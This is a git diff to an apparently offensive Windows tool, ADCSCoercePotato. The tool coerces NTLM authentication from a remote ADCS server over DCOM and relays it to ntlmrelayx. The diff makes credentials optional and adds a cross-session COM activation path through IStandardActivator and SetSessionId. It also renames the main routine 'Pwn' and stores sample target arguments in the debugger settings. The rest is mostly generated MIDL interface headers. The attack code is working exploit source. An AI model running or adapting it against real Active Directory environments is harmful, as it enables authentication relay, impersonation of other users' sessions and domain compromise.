diff --git a/ADCSCoercePotato.cpp b/ADCSCoercePotato.cpp index 12111a2..0ee3c36 100644 --- a/ADCSCoercePotato.cpp +++ b/ADCSCoercePotato.cpp @@ -15,9 +15,11 @@ #include #include #include +#include #include #include "HTTPCrossProtocolRelay.h" +#include "IStandardActivator_h.h" #pragma comment (lib, "Ws2_32.lib") #pragma comment (lib, "Mswsock.lib") @@ -34,15 +36,17 @@ wchar_t* wredir_ip=NULL; wchar_t* wredir_port=NULL; char dcom_port[12]; char dcom_ip[17]; + wchar_t* username=NULL; wchar_t* password=NULL; wchar_t* domain=NULL; static const char VERSION[] = "0.1"; -int g_sessionID = 4; +int g_sessionID = 1337; BOOL TEST_mode = FALSE; HANDLE elevated_token, duped_token; int PotatoAPI::newConnection; +int Pwn(wchar_t* clsid, BOOL brute, int sessionid); wchar_t *processtype = NULL; wchar_t *processargs = NULL; wchar_t *processname = NULL; @@ -89,9 +93,6 @@ void usage() printf("ADCSCoercePotato\n- @decoder_it 2024\n\n", VERSION); printf("Mandatory args: \n" - "-u Domain Username\n" - "-p password\n" - "-d Domain Name\n" "-m remote DCOM (ADCS) server address\n" "-k redirector where socat and ntlmrelayx is running\n" @@ -101,9 +102,11 @@ void usage() printf("Optional args: \n" "-n HTTP port where redirector (ntlmrelayx) is listening, default:80\n" "-l local socket server port, default:9999\n" - "-c default:{D99E6E74-FC88-11D0-B498-00A0C90312F3}" - - + "-c default:{D99E6E74-FC88-11D0-B498-00A0C90312F3}\n" + "-u Domain Username\n" + "-p password\n" + "-d Domain Name\n" + "-s session (it seems not working)\n" ); printf("\n\n"); printf("Example: ADCSCoercePotato.exe -m 192.168.212.22 -k 192.168.1.88 -u myuser -p mypass -d mydomain.domain\n"); @@ -134,6 +137,7 @@ void ParseUsernameFromType3(char* ntlmType3, int ntlmType3Len) { } + PotatoAPI::PotatoAPI() { comSendQ = new BlockingQueue(); rpcSendQ = new BlockingQueue(); @@ -181,7 +185,7 @@ int checkForNewConnection(SOCKET* ListenSocket, SOCKET* ClientSocket) { return 0; } -int PotatoAPI::triggerDCOM(void) +int PotatoAPI::triggerDCOM(int sessionid) { CoInitialize(nullptr); @@ -217,38 +221,88 @@ int PotatoAPI::triggerDCOM(void) ca.dwAuthzSvc = RPC_C_AUTHZ_NONE; ca.dwAuthnLevel = RPC_C_AUTHN_LEVEL_DEFAULT; ca.dwImpersonationLevel = RPC_C_IMP_LEVEL_IMPERSONATE; - COAUTHIDENTITY id = { 0 }; - ca.pAuthIdentityData = &id; - id.User = (USHORT*)username; - id.UserLength = wcslen(username); - id.Password = (USHORT*)password; - id.PasswordLength = wcslen(password);; - id.Domain = (USHORT*)domain; - id.DomainLength = wcslen(domain); - id.Flags = SEC_WINNT_AUTH_IDENTITY_UNICODE; + + + if (username != NULL || password != NULL || domain != NULL) { + COAUTHIDENTITY id = { 0 }; + ca.pAuthIdentityData = &id; + id.User = (USHORT*)username; + id.UserLength = wcslen(username); + id.Password = (USHORT*)password; + id.PasswordLength = wcslen(password);; + id.Domain = (USHORT*)domain; + id.DomainLength = wcslen(domain); + id.Flags = SEC_WINNT_AUTH_IDENTITY_UNICODE; + } + else + { + wchar_t username[256] = { 0 }; + DWORD size = sizeof(username); + GetUserNameW(username, &size); + printf("[*] Current user: %ws\n", username); + } + + COSERVERINFO c = { 0 }; c.pwszName = wdcom_ip; c.pAuthInfo = &ca; + SetConsoleOutputCP(CP_UTF8); + CoInitialize(0); CoInitializeEx(0, COINIT_APARTMENTTHREADED); CoInitializeSecurity(0, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL); - HRESULT status=0; + HRESULT status = 0; std::string message = std::system_category().message(status); - - printf("[*] Calling CoGetInstanceFromIStorage with CLSID:%S on remote endpoint:%S\n", olestr, wdcom_ip); + if (g_sessionID == 1337) + { + printf("[*] Pwning from current user session\n"); - status = CoGetInstanceFromIStorage(&c, &clsid, NULL, CLSCTX_REMOTE_SERVER, t, 1, qis); - - - if (status == CO_E_BAD_PATH) - printf("[!] Error. CLSID %S not found. Bad path to object.\n", clsid); + wprintf(L"[*] Calling CoGetInstanceFromIStorage with CLSID:%ws on remote endpoint:%ws\n", olestr, wdcom_ip); + + status = CoGetInstanceFromIStorage(&c, &clsid, NULL, CLSCTX_REMOTE_SERVER, t, 1, qis); + + + if (status == CO_E_BAD_PATH) + wprintf(L"[!] Error. CLSID %ws not found. Bad path to object.\n", olestr); + else + { + message = std::system_category().message(status); + //std::cout << "[*] Msg: " << message << std::endl; + printf("[*] Trigger DCOM status: 0x%x\n", status); + } + + fflush(stdout); + } else - printf("[*] Trigger DCOM status: 0x%x - %s\n", status, message.c_str()); - - fflush(stdout); + { + printf("[*] Pwning from session %d\n", g_sessionID); + IStandardActivator* pComAct; + HRESULT r = CoCreateInstance(CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER, IID_IStandardActivator, (LPVOID*)&pComAct); + ISpecialSystemProperties* pSpecialProperties = NULL; + + r = pComAct->QueryInterface(IID_ISpecialSystemProperties, (void**)&pSpecialProperties); + + r = pSpecialProperties->SetSessionId(g_sessionID, 0, 1); + + printf("[*] Spawning COM object in the session: %d\n", g_sessionID); + wprintf(L"[*] Calling StandardGetInstanceFromIStorage with CLSID:%ws\n", olestr); + + HRESULT status = pComAct->StandardGetInstanceFromIStorage(&c, &clsid, NULL, CLSCTX_REMOTE_SERVER, t, 1, qis); + + if (status == CO_E_BAD_PATH) + printf("[!] Error. CLSID %S not found. Bad path to object.\n", olestr); + else + { + message = std::system_category().message(status); + //std::cout << "[*] Msg: " << message << std::endl; + printf("[*] Trigger DCOM status: 0x%x\n", status); + } + fflush(stdout); + } + return 0; } @@ -393,8 +447,6 @@ void ExtractType3FromRpc(char* rpcPacket, int rpcPacketLen, char* ntlmType3, int memcpy(ntlmType3, rpcPacket + ntlmIndex, *authLen); *ntlmType3Len = (int)*authLen; ParseUsernameFromType3(ntlmType3, *ntlmType3Len); - - } int PotatoAPI::startCOMListener(void) { @@ -668,6 +720,12 @@ int wmain(int argc, wchar_t** argv) olestr = argv[1]; break; + case 's': + ++argv; + --argc; + g_sessionID = _wtoi(argv[1]); + printf("Initialized session id %d\n", g_sessionID); + break; case 'm': ++argv; @@ -711,22 +769,21 @@ int wmain(int argc, wchar_t** argv) { wredir_port = L"80"; } - if(wdcom_ip == NULL || wredir_ip==NULL ||domain==NULL || username==NULL || password==NULL) - - + if(wdcom_ip == NULL || wredir_ip==NULL) { usage(); exit(-1); } - // Fallback to default BITS CLSID + // Fallback to default CLSID Of CertSrv Request if (olestr == NULL) olestr = L"{D99E6E74-FC88-11D0-B498-00A0C90312F3}"; - exit(Juicy(NULL, FALSE)); + Pwn(NULL, FALSE, g_sessionID); + return 0; } -int Juicy(wchar_t *clsid, BOOL brute) +int Pwn(wchar_t *clsid, BOOL brute, int sessionid) { PotatoAPI* test = new PotatoAPI(); test->startCOMListenerThread(); @@ -739,7 +796,7 @@ int Juicy(wchar_t *clsid, BOOL brute) test->startRPCConnectionThread(); - test->triggerDCOM(); + test->triggerDCOM(sessionid); return 1; diff --git a/ADCSCoercePotato.vcxproj b/ADCSCoercePotato.vcxproj index a3ad3d0..1a74b96 100644 --- a/ADCSCoercePotato.vcxproj +++ b/ADCSCoercePotato.vcxproj @@ -48,7 +48,7 @@ Application false - v143 + v142 true Unicode @@ -137,7 +137,7 @@ Level3 NotUsing - MaxSpeed + Disabled true true NDEBUG;_WINDOWS;_USRDLL;MSFROTTENPOTATO_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) @@ -162,6 +162,7 @@ + @@ -173,6 +174,9 @@ + + + diff --git a/ADCSCoercePotato.vcxproj.user b/ADCSCoercePotato.vcxproj.user index 0f14913..50d9b55 100644 --- a/ADCSCoercePotato.vcxproj.user +++ b/ADCSCoercePotato.vcxproj.user @@ -1,4 +1,7 @@  - + + -m 172.16.0.3 -k 172.16.0.5 -s 2 -c {f8842f8e-dafe-4b37-9d38-4e0714a61149} + WindowsLocalDebugger + \ No newline at end of file diff --git a/IStandardActivator.idl b/IStandardActivator.idl new file mode 100644 index 0000000..db80401 --- /dev/null +++ b/IStandardActivator.idl @@ -0,0 +1,68 @@ +import "oaidl.idl"; +import "ocidl.idl"; + +[ + object, + local, + uuid(000001b8-0000-0000-C000-000000000046), + pointer_default(unique) +] +interface IStandardActivator : IUnknown +{ + HRESULT StandardGetClassObject([in] REFCLSID rclsid, + [in] DWORD dwClsCtx, + [in] COSERVERINFO* pServerInfo, + [in] REFIID riid, + [out, iid_is(riid)] void** ppv); + + HRESULT StandardCreateInstance([in] REFCLSID Clsid, + [in] IUnknown* punkOuter, + [in] DWORD dwClsCtx, + [in] COSERVERINFO* pServerInfo, + [in] DWORD dwCount, + [in, size_is(dwCount)] MULTI_QI* pResults); + + HRESULT StandardGetInstanceFromFile( + [in] COSERVERINFO* pServerInfo, + [in] CLSID* pclsidOverride, + [in] IUnknown* punkOuter, + [in] DWORD dwClsCtx, + [in] DWORD grfMode, + [in] OLECHAR* pwszName, + [in] DWORD dwCount, + [in, size_is(dwCount)] MULTI_QI* pResults); + + HRESULT StandardGetInstanceFromIStorage( + [in] COSERVERINFO* pServerInfo, + [in] CLSID* pclsidOverride, + [in] IUnknown* punkOuter, + [in] DWORD dwClsCtx, + [in] IStorage* pstg, + [in] DWORD dwCount, + [in, size_is(dwCount)] MULTI_QI* pResults); + + HRESULT Reset(); +} + +[ + object, + local, + uuid(000001b9-0000-0000-C000-000000000046), + pointer_default(unique) +] +interface ISpecialSystemProperties : IUnknown +{ + HRESULT SetSessionId([in] ULONG dwSessionId, [in]BOOL bUseConsole, [in] BOOL fRemoteThisSessionId); + HRESULT GetSessionId([out] ULONG* pdwSessionId, [out]BOOL* pbUseConsole); + HRESULT GetSessionId2([out] ULONG* pdwSessionId, [out]BOOL* pbUseConsole, [out] BOOL* pfRemoteThisSessionId); + HRESULT SetClientImpersonating([in]BOOL fClientImpersonating); + HRESULT GetClientImpersonating([out]BOOL* pfClientImpersonating); + HRESULT SetPartitionId([in] REFGUID guidPartiton); + HRESULT GetPartitionId([out] GUID* pguidPartiton); + HRESULT SetProcessRequestType([in] DWORD dwPRT); + HRESULT GetProcessRequestType([out] DWORD* pdwPRT); + HRESULT SetOrigClsctx([in] DWORD dwClsctx); + HRESULT GetOrigClsctx([out] DWORD* dwClsctx); + HRESULT GetDefaultAuthenticationLevel([out] DWORD* pdwAuthnLevel); + HRESULT SetDefaultAuthenticationLevel([in] DWORD dwAuthnLevel); +} diff --git a/IStandardActivator_h.h b/IStandardActivator_h.h new file mode 100644 index 0000000..687c5af --- /dev/null +++ b/IStandardActivator_h.h @@ -0,0 +1,452 @@ + + +/* this ALWAYS GENERATED file contains the definitions for the interfaces */ + + + /* File created by MIDL compiler version 8.01.0622 */ +/* at Tue Jan 19 06:14:07 2038 + */ +/* Compiler settings for IStandardActivator.idl: + Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 + protocol : all , ms_ext, c_ext, robust + error checks: allocation ref bounds_check enum stub_data + VC __declspec() decoration level: + __declspec(uuid()), __declspec(selectany), __declspec(novtable) + DECLSPEC_UUID(), MIDL_INTERFACE() +*/ +/* @@MIDL_FILE_HEADING( ) */ + + + +/* verify that the version is high enough to compile this file*/ +#ifndef __REQUIRED_RPCNDR_H_VERSION__ +#define __REQUIRED_RPCNDR_H_VERSION__ 500 +#endif + +#include "rpc.h" +#include "rpcndr.h" + +#ifndef __RPCNDR_H_VERSION__ +#error this stub requires an updated version of +#endif /* __RPCNDR_H_VERSION__ */ + +#ifndef COM_NO_WINDOWS_H +#include "windows.h" +#include "ole2.h" +#endif /*COM_NO_WINDOWS_H*/ + +#ifndef __IStandardActivator_h_h__ +#define __IStandardActivator_h_h__ + +#if defined(_MSC_VER) && (_MSC_VER >= 1020) +#pragma once +#endif + +/* Forward Declarations */ + +#ifndef __IStandardActivator_FWD_DEFINED__ +#define __IStandardActivator_FWD_DEFINED__ +typedef interface IStandardActivator IStandardActivator; + +#endif /* __IStandardActivator_FWD_DEFINED__ */ + + +#ifndef __ISpecialSystemProperties_FWD_DEFINED__ +#define __ISpecialSystemProperties_FWD_DEFINED__ +typedef interface ISpecialSystemProperties ISpecialSystemProperties; + +#endif /* __ISpecialSystemProperties_FWD_DEFINED__ */ + + +/* header files for imported files */ +#include "oaidl.h" +#include "ocidl.h" + +#ifdef __cplusplus +extern "C"{ +#endif + + +#ifndef __IStandardActivator_INTERFACE_DEFINED__ +#define __IStandardActivator_INTERFACE_DEFINED__ + +/* interface IStandardActivator */ +/* [unique][uuid][local][object] */ + + +EXTERN_C const IID IID_IStandardActivator; + +#if defined(__cplusplus) && !defined(CINTERFACE) + + MIDL_INTERFACE("000001b8-0000-0000-C000-000000000046") + IStandardActivator : public IUnknown + { + public: + virtual HRESULT STDMETHODCALLTYPE StandardGetClassObject( + /* [in] */ REFCLSID rclsid, + /* [in] */ DWORD dwClsCtx, + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ REFIID riid, + /* [iid_is][out] */ void **ppv) = 0; + + virtual HRESULT STDMETHODCALLTYPE StandardCreateInstance( + /* [in] */ REFCLSID Clsid, + /* [in] */ IUnknown *punkOuter, + /* [in] */ DWORD dwClsCtx, + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ DWORD dwCount, + /* [size_is][in] */ MULTI_QI *pResults) = 0; + + virtual HRESULT STDMETHODCALLTYPE StandardGetInstanceFromFile( + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ CLSID *pclsidOverride, + /* [in] */ IUnknown *punkOuter, + /* [in] */ DWORD dwClsCtx, + /* [in] */ DWORD grfMode, + /* [in] */ OLECHAR *pwszName, + /* [in] */ DWORD dwCount, + /* [size_is][in] */ MULTI_QI *pResults) = 0; + + virtual HRESULT STDMETHODCALLTYPE StandardGetInstanceFromIStorage( + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ CLSID *pclsidOverride, + /* [in] */ IUnknown *punkOuter, + /* [in] */ DWORD dwClsCtx, + /* [in] */ IStorage *pstg, + /* [in] */ DWORD dwCount, + /* [size_is][in] */ MULTI_QI *pResults) = 0; + + virtual HRESULT STDMETHODCALLTYPE Reset( void) = 0; + + }; + + +#else /* C style interface */ + + typedef struct IStandardActivatorVtbl + { + BEGIN_INTERFACE + + HRESULT ( STDMETHODCALLTYPE *QueryInterface )( + IStandardActivator * This, + /* [in] */ REFIID riid, + /* [annotation][iid_is][out] */ + _COM_Outptr_ void **ppvObject); + + ULONG ( STDMETHODCALLTYPE *AddRef )( + IStandardActivator * This); + + ULONG ( STDMETHODCALLTYPE *Release )( + IStandardActivator * This); + + HRESULT ( STDMETHODCALLTYPE *StandardGetClassObject )( + IStandardActivator * This, + /* [in] */ REFCLSID rclsid, + /* [in] */ DWORD dwClsCtx, + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ REFIID riid, + /* [iid_is][out] */ void **ppv); + + HRESULT ( STDMETHODCALLTYPE *StandardCreateInstance )( + IStandardActivator * This, + /* [in] */ REFCLSID Clsid, + /* [in] */ IUnknown *punkOuter, + /* [in] */ DWORD dwClsCtx, + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ DWORD dwCount, + /* [size_is][in] */ MULTI_QI *pResults); + + HRESULT ( STDMETHODCALLTYPE *StandardGetInstanceFromFile )( + IStandardActivator * This, + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ CLSID *pclsidOverride, + /* [in] */ IUnknown *punkOuter, + /* [in] */ DWORD dwClsCtx, + /* [in] */ DWORD grfMode, + /* [in] */ OLECHAR *pwszName, + /* [in] */ DWORD dwCount, + /* [size_is][in] */ MULTI_QI *pResults); + + HRESULT ( STDMETHODCALLTYPE *StandardGetInstanceFromIStorage )( + IStandardActivator * This, + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ CLSID *pclsidOverride, + /* [in] */ IUnknown *punkOuter, + /* [in] */ DWORD dwClsCtx, + /* [in] */ IStorage *pstg, + /* [in] */ DWORD dwCount, + /* [size_is][in] */ MULTI_QI *pResults); + + HRESULT ( STDMETHODCALLTYPE *Reset )( + IStandardActivator * This); + + END_INTERFACE + } IStandardActivatorVtbl; + + interface IStandardActivator + { + CONST_VTBL struct IStandardActivatorVtbl *lpVtbl; + }; + + + +#ifdef COBJMACROS + + +#define IStandardActivator_QueryInterface(This,riid,ppvObject) \ + ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) + +#define IStandardActivator_AddRef(This) \ + ( (This)->lpVtbl -> AddRef(This) ) + +#define IStandardActivator_Release(This) \ + ( (This)->lpVtbl -> Release(This) ) + + +#define IStandardActivator_StandardGetClassObject(This,rclsid,dwClsCtx,pServerInfo,riid,ppv) \ + ( (This)->lpVtbl -> StandardGetClassObject(This,rclsid,dwClsCtx,pServerInfo,riid,ppv) ) + +#define IStandardActivator_StandardCreateInstance(This,Clsid,punkOuter,dwClsCtx,pServerInfo,dwCount,pResults) \ + ( (This)->lpVtbl -> StandardCreateInstance(This,Clsid,punkOuter,dwClsCtx,pServerInfo,dwCount,pResults) ) + +#define IStandardActivator_StandardGetInstanceFromFile(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,grfMode,pwszName,dwCount,pResults) \ + ( (This)->lpVtbl -> StandardGetInstanceFromFile(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,grfMode,pwszName,dwCount,pResults) ) + +#define IStandardActivator_StandardGetInstanceFromIStorage(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,pstg,dwCount,pResults) \ + ( (This)->lpVtbl -> StandardGetInstanceFromIStorage(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,pstg,dwCount,pResults) ) + +#define IStandardActivator_Reset(This) \ + ( (This)->lpVtbl -> Reset(This) ) + +#endif /* COBJMACROS */ + + +#endif /* C style interface */ + + + + +#endif /* __IStandardActivator_INTERFACE_DEFINED__ */ + + +#ifndef __ISpecialSystemProperties_INTERFACE_DEFINED__ +#define __ISpecialSystemProperties_INTERFACE_DEFINED__ + +/* interface ISpecialSystemProperties */ +/* [unique][uuid][local][object] */ + + +EXTERN_C const IID IID_ISpecialSystemProperties; + +#if defined(__cplusplus) && !defined(CINTERFACE) + + MIDL_INTERFACE("000001b9-0000-0000-C000-000000000046") + ISpecialSystemProperties : public IUnknown + { + public: + virtual HRESULT STDMETHODCALLTYPE SetSessionId( + /* [in] */ ULONG dwSessionId, + /* [in] */ BOOL bUseConsole, + /* [in] */ BOOL fRemoteThisSessionId) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetSessionId( + /* [out] */ ULONG *pdwSessionId, + /* [out] */ BOOL *pbUseConsole) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetSessionId2( + /* [out] */ ULONG *pdwSessionId, + /* [out] */ BOOL *pbUseConsole, + /* [out] */ BOOL *pfRemoteThisSessionId) = 0; + + virtual HRESULT STDMETHODCALLTYPE SetClientImpersonating( + /* [in] */ BOOL fClientImpersonating) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetClientImpersonating( + /* [out] */ BOOL *pfClientImpersonating) = 0; + + virtual HRESULT STDMETHODCALLTYPE SetPartitionId( + /* [in] */ REFGUID guidPartiton) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetPartitionId( + /* [out] */ GUID *pguidPartiton) = 0; + + virtual HRESULT STDMETHODCALLTYPE SetProcessRequestType( + /* [in] */ DWORD dwPRT) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetProcessRequestType( + /* [out] */ DWORD *pdwPRT) = 0; + + virtual HRESULT STDMETHODCALLTYPE SetOrigClsctx( + /* [in] */ DWORD dwClsctx) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetOrigClsctx( + /* [out] */ DWORD *dwClsctx) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetDefaultAuthenticationLevel( + /* [out] */ DWORD *pdwAuthnLevel) = 0; + + virtual HRESULT STDMETHODCALLTYPE SetDefaultAuthenticationLevel( + /* [in] */ DWORD dwAuthnLevel) = 0; + + }; + + +#else /* C style interface */ + + typedef struct ISpecialSystemPropertiesVtbl + { + BEGIN_INTERFACE + + HRESULT ( STDMETHODCALLTYPE *QueryInterface )( + ISpecialSystemProperties * This, + /* [in] */ REFIID riid, + /* [annotation][iid_is][out] */ + _COM_Outptr_ void **ppvObject); + + ULONG ( STDMETHODCALLTYPE *AddRef )( + ISpecialSystemProperties * This); + + ULONG ( STDMETHODCALLTYPE *Release )( + ISpecialSystemProperties * This); + + HRESULT ( STDMETHODCALLTYPE *SetSessionId )( + ISpecialSystemProperties * This, + /* [in] */ ULONG dwSessionId, + /* [in] */ BOOL bUseConsole, + /* [in] */ BOOL fRemoteThisSessionId); + + HRESULT ( STDMETHODCALLTYPE *GetSessionId )( + ISpecialSystemProperties * This, + /* [out] */ ULONG *pdwSessionId, + /* [out] */ BOOL *pbUseConsole); + + HRESULT ( STDMETHODCALLTYPE *GetSessionId2 )( + ISpecialSystemProperties * This, + /* [out] */ ULONG *pdwSessionId, + /* [out] */ BOOL *pbUseConsole, + /* [out] */ BOOL *pfRemoteThisSessionId); + + HRESULT ( STDMETHODCALLTYPE *SetClientImpersonating )( + ISpecialSystemProperties * This, + /* [in] */ BOOL fClientImpersonating); + + HRESULT ( STDMETHODCALLTYPE *GetClientImpersonating )( + ISpecialSystemProperties * This, + /* [out] */ BOOL *pfClientImpersonating); + + HRESULT ( STDMETHODCALLTYPE *SetPartitionId )( + ISpecialSystemProperties * This, + /* [in] */ REFGUID guidPartiton); + + HRESULT ( STDMETHODCALLTYPE *GetPartitionId )( + ISpecialSystemProperties * This, + /* [out] */ GUID *pguidPartiton); + + HRESULT ( STDMETHODCALLTYPE *SetProcessRequestType )( + ISpecialSystemProperties * This, + /* [in] */ DWORD dwPRT); + + HRESULT ( STDMETHODCALLTYPE *GetProcessRequestType )( + ISpecialSystemProperties * This, + /* [out] */ DWORD *pdwPRT); + + HRESULT ( STDMETHODCALLTYPE *SetOrigClsctx )( + ISpecialSystemProperties * This, + /* [in] */ DWORD dwClsctx); + + HRESULT ( STDMETHODCALLTYPE *GetOrigClsctx )( + ISpecialSystemProperties * This, + /* [out] */ DWORD *dwClsctx); + + HRESULT ( STDMETHODCALLTYPE *GetDefaultAuthenticationLevel )( + ISpecialSystemProperties * This, + /* [out] */ DWORD *pdwAuthnLevel); + + HRESULT ( STDMETHODCALLTYPE *SetDefaultAuthenticationLevel )( + ISpecialSystemProperties * This, + /* [in] */ DWORD dwAuthnLevel); + + END_INTERFACE + } ISpecialSystemPropertiesVtbl; + + interface ISpecialSystemProperties + { + CONST_VTBL struct ISpecialSystemPropertiesVtbl *lpVtbl; + }; + + + +#ifdef COBJMACROS + + +#define ISpecialSystemProperties_QueryInterface(This,riid,ppvObject) \ + ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) + +#define ISpecialSystemProperties_AddRef(This) \ + ( (This)->lpVtbl -> AddRef(This) ) + +#define ISpecialSystemProperties_Release(This) \ + ( (This)->lpVtbl -> Release(This) ) + + +#define ISpecialSystemProperties_SetSessionId(This,dwSessionId,bUseConsole,fRemoteThisSessionId) \ + ( (This)->lpVtbl -> SetSessionId(This,dwSessionId,bUseConsole,fRemoteThisSessionId) ) + +#define ISpecialSystemProperties_GetSessionId(This,pdwSessionId,pbUseConsole) \ + ( (This)->lpVtbl -> GetSessionId(This,pdwSessionId,pbUseConsole) ) + +#define ISpecialSystemProperties_GetSessionId2(This,pdwSessionId,pbUseConsole,pfRemoteThisSessionId) \ + ( (This)->lpVtbl -> GetSessionId2(This,pdwSessionId,pbUseConsole,pfRemoteThisSessionId) ) + +#define ISpecialSystemProperties_SetClientImpersonating(This,fClientImpersonating) \ + ( (This)->lpVtbl -> SetClientImpersonating(This,fClientImpersonating) ) + +#define ISpecialSystemProperties_GetClientImpersonating(This,pfClientImpersonating) \ + ( (This)->lpVtbl -> GetClientImpersonating(This,pfClientImpersonating) ) + +#define ISpecialSystemProperties_SetPartitionId(This,guidPartiton) \ + ( (This)->lpVtbl -> SetPartitionId(This,guidPartiton) ) + +#define ISpecialSystemProperties_GetPartitionId(This,pguidPartiton) \ + ( (This)->lpVtbl -> GetPartitionId(This,pguidPartiton) ) + +#define ISpecialSystemProperties_SetProcessRequestType(This,dwPRT) \ + ( (This)->lpVtbl -> SetProcessRequestType(This,dwPRT) ) + +#define ISpecialSystemProperties_GetProcessRequestType(This,pdwPRT) \ + ( (This)->lpVtbl -> GetProcessRequestType(This,pdwPRT) ) + +#define ISpecialSystemProperties_SetOrigClsctx(This,dwClsctx) \ + ( (This)->lpVtbl -> SetOrigClsctx(This,dwClsctx) ) + +#define ISpecialSystemProperties_GetOrigClsctx(This,dwClsctx) \ + ( (This)->lpVtbl -> GetOrigClsctx(This,dwClsctx) ) + +#define ISpecialSystemProperties_GetDefaultAuthenticationLevel(This,pdwAuthnLevel) \ + ( (This)->lpVtbl -> GetDefaultAuthenticationLevel(This,pdwAuthnLevel) ) + +#define ISpecialSystemProperties_SetDefaultAuthenticationLevel(This,dwAuthnLevel) \ + ( (This)->lpVtbl -> SetDefaultAuthenticationLevel(This,dwAuthnLevel) ) + +#endif /* COBJMACROS */ + + +#endif /* C style interface */ + + + + +#endif /* __ISpecialSystemProperties_INTERFACE_DEFINED__ */ + + +/* Additional Prototypes for ALL interfaces */ + +/* end of Additional Prototypes */ + +#ifdef __cplusplus +} +#endif + +#endif + + diff --git a/IStandardActivator_i.c b/IStandardActivator_i.c index fd764df..8a74e09 100644 --- a/IStandardActivator_i.c +++ b/IStandardActivator_i.c @@ -5,11 +5,11 @@ /* link this file in with the server and any clients */ - /* File created by MIDL compiler version 8.01.0626 */ -/* at Tue Jan 19 04:14:07 2038 + /* File created by MIDL compiler version 8.01.0622 */ +/* at Tue Jan 19 06:14:07 2038 */ /* Compiler settings for IStandardActivator.idl: - Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 + Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 protocol : all , ms_ext, c_ext, robust error checks: allocation ref bounds_check enum stub_data VC __declspec() decoration level: diff --git a/IStandardActivator_p.c b/IStandardActivator_p.c index 2ca89b6..e4afa4b 100644 --- a/IStandardActivator_p.c +++ b/IStandardActivator_p.c @@ -3,11 +3,11 @@ /* this ALWAYS GENERATED file contains the proxy stub code */ - /* File created by MIDL compiler version 8.01.0626 */ -/* at Tue Jan 19 04:14:07 2038 + /* File created by MIDL compiler version 8.01.0622 */ +/* at Tue Jan 19 06:14:07 2038 */ /* Compiler settings for IStandardActivator.idl: - Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 + Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 protocol : all , ms_ext, c_ext, robust error checks: allocation ref bounds_check enum stub_data VC __declspec() decoration level: @@ -77,58 +77,6 @@ static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax = {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}; -#if defined(_CONTROL_FLOW_GUARD_XFG) -#define XFG_TRAMPOLINES(ObjectType)\ -static unsigned long ObjectType ## _UserSize_XFG(unsigned long * pFlags, unsigned long Offset, void * pObject)\ -{\ -return ObjectType ## _UserSize(pFlags, Offset, pObject);\ -}\ -static unsigned char * ObjectType ## _UserMarshal_XFG(unsigned long * pFlags, unsigned char * pBuffer, void * pObject)\ -{\ -return ObjectType ## _UserMarshal(pFlags, pBuffer, pObject);\ -}\ -static unsigned char * ObjectType ## _UserUnmarshal_XFG(unsigned long * pFlags, unsigned char * pBuffer, void * pObject)\ -{\ -return ObjectType ## _UserUnmarshal(pFlags, pBuffer, pObject);\ -}\ -static void ObjectType ## _UserFree_XFG(unsigned long * pFlags, void * pObject)\ -{\ -ObjectType ## _UserFree(pFlags, pObject);\ -} -#define XFG_TRAMPOLINES64(ObjectType)\ -static unsigned long ObjectType ## _UserSize64_XFG(unsigned long * pFlags, unsigned long Offset, void * pObject)\ -{\ -return ObjectType ## _UserSize64(pFlags, Offset, pObject);\ -}\ -static unsigned char * ObjectType ## _UserMarshal64_XFG(unsigned long * pFlags, unsigned char * pBuffer, void * pObject)\ -{\ -return ObjectType ## _UserMarshal64(pFlags, pBuffer, pObject);\ -}\ -static unsigned char * ObjectType ## _UserUnmarshal64_XFG(unsigned long * pFlags, unsigned char * pBuffer, void * pObject)\ -{\ -return ObjectType ## _UserUnmarshal64(pFlags, pBuffer, pObject);\ -}\ -static void ObjectType ## _UserFree64_XFG(unsigned long * pFlags, void * pObject)\ -{\ -ObjectType ## _UserFree64(pFlags, pObject);\ -} -#define XFG_BIND_TRAMPOLINES(HandleType, ObjectType)\ -static void* ObjectType ## _bind_XFG(HandleType pObject)\ -{\ -return ObjectType ## _bind((ObjectType) pObject);\ -}\ -static void ObjectType ## _unbind_XFG(HandleType pObject, handle_t ServerHandle)\ -{\ -ObjectType ## _unbind((ObjectType) pObject, ServerHandle);\ -} -#define XFG_TRAMPOLINE_FPTR(Function) Function ## _XFG -#else -#define XFG_TRAMPOLINES(ObjectType) -#define XFG_TRAMPOLINES64(ObjectType) -#define XFG_BIND_TRAMPOLINES(HandleType, ObjectType) -#define XFG_TRAMPOLINE_FPTR(Function) Function -#endif - extern const IStandardActivator_MIDL_TYPE_FORMAT_STRING IStandardActivator__MIDL_TypeFormatString; @@ -180,11 